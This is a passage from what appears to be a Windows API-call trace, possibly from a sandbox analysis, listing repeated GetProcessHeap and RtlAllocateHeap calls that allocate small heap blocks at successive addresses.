Size=0x10) returned 0x380870 [0047.928] GetProcessHeap () returned 0x360000 [0047.928] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3808c0 [0047.928] GetProcessHeap () returned 0x360000 [0047.928] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3808e0 [0047.928] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380900 [0047.929] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380920 [0047.929] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380940 [0047.929] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380960 [0047.929] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380980 [0047.929] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3809a0 [0047.929] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3809c0 [0047.929] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3809e0 [0047.929] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380a00 [0047.929] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380a20 [0047.929] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380a40 [0047.929] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380a60 [0047.929] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380a80 [0047.929] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380aa0 [0047.929] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380ac0 [0047.929] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380ae0 [0047.929] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380b00 [0047.929] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380b20 [0047.929] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380b40 [0047.929] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380b60 [0047.929] GetProcessHeap () returned 0x360000 [0047.929] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380b80 [0047.929] GetProcessHeap () returned 0x360000 [0047.930] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380ba0 [0047.930] GetProcessHeap () returned 0x360000 [0047.930] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380bc0 [0047.930] GetProcessHeap () returned 0x360000 [0047.930] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380be0 [0047.930] GetProcessHeap () returned 0x360000 [0047.930] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380c00 [0047.930] GetProcessHeap () returned 0x360000 [0047.930] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380c20 [0047.930] GetProcessHeap () returned 0x360000 [0047.930] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380c40 [0047.930] GetProcessHeap () returned 0x360000 [0047.930] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380c60 [0047.930] GetProcessHeap () returned 0x360000 [0047.930] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380c80 [0047.930] GetProcessHeap () returned 0x360000 [0047.930] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380ca0 [0047.930] GetProcessHeap () returned 0x360000 [0047.930] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380cc0 [0047.930] GetProcessHeap () returned 0x360000 [0047.930] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380ce0 [0047.930] GetProcessHeap () returned 0x360000 [0047.930] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380d00 [0047.930] GetProcessHeap () returned 0x360000 [0047.930] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380d20 [0047.930] GetProcessHeap () returned 0x360000 [0047.930] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380d40 [0047.930] GetProcessHeap () returned 0x360000 [0047.930] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380d60 [0047.930] GetProcessHeap () returned 0x360000 [0047.930] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380d80 [0047.930] GetProcessHeap () returned 0x360000 [0047.930] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380da0 [0047.930] GetProcessHeap () returned 0x360000 [0047.930] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380dc0 [0047.930] GetProcessHeap () returned 0x360000 [0047.930] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380de0 [0047.930] GetProcessHeap () returned 0x360000 [0047.930] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380e00 [0047.931] GetProcessHeap () returned 0x360000 [0047.931] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380e20 [0047.931] GetProcessHeap () returned 0x360000 [0047.931] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380e40 [0047.931] GetProcessHeap () returned 0x360000 [0047.931] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380e60 [0047.931] GetProcessHeap () returned 0x360000 [0047.931] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380e80 [0047.931] GetProcessHeap () returned 0x360000 [0047.931] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380ea0 [0047.931] GetProcessHeap () returned 0x360000 [0047.931] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380ec0 [0047.931] GetProcessHeap () returned 0x360000 [0047.931] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380ee0 [0047.931] GetProcessHeap () returned 0x360000 [0047.931] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380f00 [0047.931] GetProcessHeap () returned 0x360000 [0047.931] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380f20 [0047.931] GetProcessHeap () returned 0x360000 [0047.931] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380f40 [0047.931] GetProcessHeap () returned 0x360000 [0047.931] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380f60 [0047.931] GetProcessHeap () returned 0x360000 [0047.931] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380f80 [0047.931] GetProcessHeap () returned 0x360000 [0047.931] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380fa0 [0047.931] GetProcessHeap () returned 0x360000 [0047.931] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380fc0 [0047.931] GetProcessHeap () returned 0x360000 [0047.931] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x380fe0 [0047.931] GetProcessHeap () returned 0x360000 [0047.931] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381000 [0047.931] GetProcessHeap () returned 0x360000 [0047.931] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381020 [0047.931] GetProcessHeap () returned 0x360000 [0047.931] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381040 [0047.931] GetProcessHeap () returned 0x360000 [0047.931] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381060 [0047.931] GetProcessHeap () returned 0x360000 [0047.931] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3810c0 [0047.932] GetProcessHeap () returned 0x360000 [0047.932] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3810e0 [0047.932] GetProcessHeap () returned 0x360000 [0047.932] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381100 [0047.932] GetProcessHeap () returned 0x360000 [0047.932] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381120 [0047.932] GetProcessHeap () returned 0x360000 [0047.932] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381140 [0047.932] GetProcessHeap () returned 0x360000 [0047.932] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381160 [0047.932] GetProcessHeap () returned 0x360000 [0047.932] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381180 [0047.932] GetProcessHeap () returned 0x360000 [0047.932] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3811a0 [0047.932] GetProcessHeap () returned 0x360000 [0047.932] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3811c0 [0047.932] GetProcessHeap () returned 0x360000 [0047.932] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3811e0 [0047.932] GetProcessHeap () returned 0x360000 [0047.932] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381200 [0047.932] GetProcessHeap () returned 0x360000 [0047.932] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381220 [0047.932] GetProcessHeap () returned 0x360000 [0047.932] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381240 [0047.932] GetProcessHeap () returned 0x360000 [0047.932] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381260 [0047.932] GetProcessHeap () returned 0x360000 [0047.932] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381280 [0047.932] GetProcessHeap () returned 0x360000 [0047.932] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3812a0 [0047.932] GetProcessHeap () returned 0x360000 [0047.932] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3812c0 [0047.932] GetProcessHeap () returned 0x360000 [0047.932] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3812e0 [0047.932] GetProcessHeap () returned 0x360000 [0047.932] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381300 [0047.932] GetProcessHeap () returned 0x360000 [0047.933] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381320 [0047.933] GetProcessHeap () returned 0x360000 [0047.933] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381340 [0047.933] GetProcessHeap () returned 0x360000 [0047.933] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381360 [0047.933] GetProcessHeap () returned 0x360000 [0047.933] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381380 [0047.933] GetProcessHeap () returned 0x360000 [0047.933] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3813a0 [0047.933] GetProcessHeap () returned 0x360000 [0047.933] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3813c0 [0047.933] GetProcessHeap () returned 0x360000 [0047.933] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3813e0 [0047.933] GetProcessHeap () returned 0x360000 [0047.933] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381400 [0047.933] GetProcessHeap () returned 0x360000 [0047.934] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381420 [0047.934] GetProcessHeap () returned 0x360000 [0047.934] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381440 [0047.934] GetProcessHeap () returned 0x360000 [0047.934] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381460 [0047.934] GetProcessHeap () returned 0x360000 [0047.934] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381480 [0047.934] GetProcessHeap () returned 0x360000 [0047.934] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3814a0 [0047.934] GetProcessHeap () returned 0x360000 [0047.934] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3814c0 [0047.934] GetProcessHeap () returned 0x360000 [0047.934] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3814e0 [0047.934] GetProcessHeap () returned 0x360000 [0047.934] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381500 [0047.934] GetProcessHeap () returned 0x360000 [0047.934] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381520 [0047.934] GetProcessHeap () returned 0x360000 [0047.934] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381540 [0047.934] GetProcessHeap () returned 0x360000 [0047.934] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381560 [0047.934] GetProcessHeap () returned 0x360000 [0047.934] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381580 [0047.935] GetProcessHeap () returned 0x360000 [0047.935] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3815a0 [0047.935] GetProcessHeap () returned 0x360000 [0047.935] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3815c0 [0047.935] GetProcessHeap () returned 0x360000 [0047.935] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3815e0 [0047.935] GetProcessHeap () returned 0x360000 [0047.935] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381600 [0047.935] GetProcessHeap () returned 0x360000 [0047.935] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381620 [0047.935] GetProcessHeap () returned 0x360000 [0047.935] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381640 [0047.935] GetProcessHeap () returned 0x360000 [0047.935] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381660 [0047.935] GetProcessHeap () returned 0x360000 [0047.935] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381680 [0047.935] GetProcessHeap () returned 0x360000 [0047.935] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3816a0 [0047.935] GetProcessHeap () returned 0x360000 [0047.935] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3816c0 [0047.935] GetProcessHeap () returned 0x360000 [0047.935] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3816e0 [0047.935] GetProcessHeap () returned 0x360000 [0047.935] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381700 [0047.935] GetProcessHeap () returned 0x360000 [0047.935] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381720 [0047.935] GetProcessHeap () returned 0x360000 [0047.935] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381740 [0047.935] GetProcessHeap () returned 0x360000 [0047.935] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381760 [0047.935] GetProcessHeap () returned 0x360000 [0047.935] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381780 [0047.936] GetProcessHeap () returned 0x360000 [0047.936] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3817a0 [0047.936] GetProcessHeap () returned 0x360000 [0047.936] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3817c0 [0047.936] GetProcessHeap () returned 0x360000 [0047.936] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3817e0 [0047.936] GetProcessHeap () returned 0x360000 [0047.936] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381800 [0047.936] GetProcessHeap () returned 0x360000 [0047.936] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381820 [0047.936] GetProcessHeap () returned 0x360000 [0047.936] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381840 [0047.936] GetProcessHeap () returned 0x360000 [0047.936] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381860 [0047.936] GetProcessHeap () returned 0x360000 [0047.936] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3818c0 [0047.936] GetProcessHeap () returned 0x360000 [0047.936] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3818e0 [0047.936] GetProcessHeap () returned 0x360000 [0047.936] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381900 [0047.936] GetProcessHeap () returned 0x360000 [0047.936] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381920 [0047.936] GetProcessHeap () returned 0x360000 [0047.936] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381940 [0047.936] GetProcessHeap () returned 0x360000 [0047.936] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381960 [0047.936] GetProcessHeap () returned 0x360000 [0047.936] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381980 [0047.936] GetProcessHeap () returned 0x360000 [0047.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3819a0 [0047.937] GetProcessHeap () returned 0x360000 [0047.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3819c0 [0047.937] GetProcessHeap () returned 0x360000 [0047.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3819e0 [0047.937] GetProcessHeap () returned 0x360000 [0047.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381a00 [0047.937] GetProcessHeap () returned 0x360000 [0047.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381a20 [0047.937] GetProcessHeap () returned 0x360000 [0047.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381a40 [0047.937] GetProcessHeap () returned 0x360000 [0047.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381a60 [0047.937] GetProcessHeap () returned 0x360000 [0047.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381a80 [0047.937] GetProcessHeap () returned 0x360000 [0047.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381aa0 [0047.937] GetProcessHeap () returned 0x360000 [0047.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381ac0 [0047.937] GetProcessHeap () returned 0x360000 [0047.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381ae0 [0047.937] GetProcessHeap () returned 0x360000 [0047.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381b00 [0047.937] GetProcessHeap () returned 0x360000 [0047.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381b20 [0047.937] GetProcessHeap () returned 0x360000 [0047.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381b40 [0047.937] GetProcessHeap () returned 0x360000 [0047.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381b60 [0047.937] GetProcessHeap () returned 0x360000 [0047.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381b80 [0047.937] GetProcessHeap () returned 0x360000 [0047.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381ba0 [0047.937] GetProcessHeap () returned 0x360000 [0047.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381bc0 [0047.937] GetProcessHeap () returned 0x360000 [0047.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381be0 [0047.937] GetProcessHeap () returned 0x360000 [0047.937] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381c00 [0047.937] GetProcessHeap () returned 0x360000 [0047.938] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381c20 [0047.938] GetProcessHeap () returned 0x360000 [0047.938] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381c40 [0047.938] GetProcessHeap () returned 0x360000 [0047.938] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381c60 [0047.938] GetProcessHeap () returned 0x360000 [0047.938] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381c80 [0047.938] GetProcessHeap () returned 0x360000 [0047.938] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381ca0 [0047.938] GetProcessHeap () returned 0x360000 [0047.938] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381cc0 [0047.938] GetProcessHeap () returned 0x360000 [0047.938] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381ce0 [0047.938] GetProcessHeap () returned 0x360000 [0047.938] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381d00 [0047.938] GetProcessHeap () returned 0x360000 [0047.938] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381d20 [0047.938] GetProcessHeap () returned 0x360000 [0047.938] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381d40 [0047.938] GetProcessHeap () returned 0x360000 [0047.938] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381d60 [0047.938] GetProcessHeap () returned 0x360000 [0047.938] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381d80 [0047.938] GetProcessHeap () returned 0x360000 [0047.938] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381da0 [0047.938] GetProcessHeap () returned 0x360000 [0047.938] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381dc0 [0047.938] GetProcessHeap () returned 0x360000 [0047.938] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381de0 [0047.938] GetProcessHeap () returned 0x360000 [0047.938] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381e00 [0047.938] GetProcessHeap () returned 0x360000 [0047.938] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381e20 [0047.938] GetProcessHeap () returned 0x360000 [0047.938] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381e40 [0047.939] GetProcessHeap () returned 0x360000 [0047.939] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381e60 [0047.939] GetProcessHeap () returned 0x360000 [0047.939] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381e80 [0047.939] GetProcessHeap () returned 0x360000 [0047.939] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381ea0 [0047.939] GetProcessHeap () returned 0x360000 [0047.939] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381ec0 [0047.939] GetProcessHeap () returned 0x360000 [0047.939] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381ee0 [0047.939] GetProcessHeap () returned 0x360000 [0047.939] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381f00 [0047.939] GetProcessHeap () returned 0x360000 [0047.939] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381f20 [0047.939] GetProcessHeap () returned 0x360000 [0047.939] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381f40 [0047.939] GetProcessHeap () returned 0x360000 [0047.939] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381f60 [0047.939] GetProcessHeap () returned 0x360000 [0047.939] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381f80 [0047.939] GetProcessHeap () returned 0x360000 [0047.939] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381fa0 [0047.939] GetProcessHeap () returned 0x360000 [0047.939] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381fc0 [0047.939] GetProcessHeap () returned 0x360000 [0047.939] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x381fe0 [0047.939] GetProcessHeap () returned 0x360000 [0047.939] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x382000 [0047.939] GetProcessHeap () returned 0x360000 [0047.939] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x382020 [0047.939] GetProcessHeap () returned 0x360000 [0047.939] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x382040 [0047.939] GetProcessHeap () returned 0x360000 [0047.939] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x382060 [0047.939] GetProcessHeap () returned 0x360000 [0047.940] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3820c0 [0047.940] GetProcessHeap () returned 0x360000 [0047.940] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3820e0 [0047.940] GetProcessHeap () returned 0x360000 [0047.940] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x382100 [0047.940] GetProcessHeap () returned 0x360000 [0047.940] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x382120 [0047.940] GetProcessHeap () returned 0x360000 [0047.940] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x382140 [0047.940] GetProcessHeap () returned 0x360000 [0047.940] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x382160 [0047.940] GetProcessHeap () returned 0x360000 [0047.940] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x382180 [0047.940] GetProcessHeap () returned 0x360000 [0047.940] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3821a0 [0047.940] GetProcessHeap () returned 0x360000 [0047.940] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3821c0 [0047.940] GetProcessHeap () returned 0x360000 [0047.940] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x3821e0 [0047.940] GetProcessHeap () returned 0x360000 [0047.940] RtlAllocateHeap (HeapHandle=0x360000, Flags=0x0, Size=0x10) returned 0x382200 [0047.940] 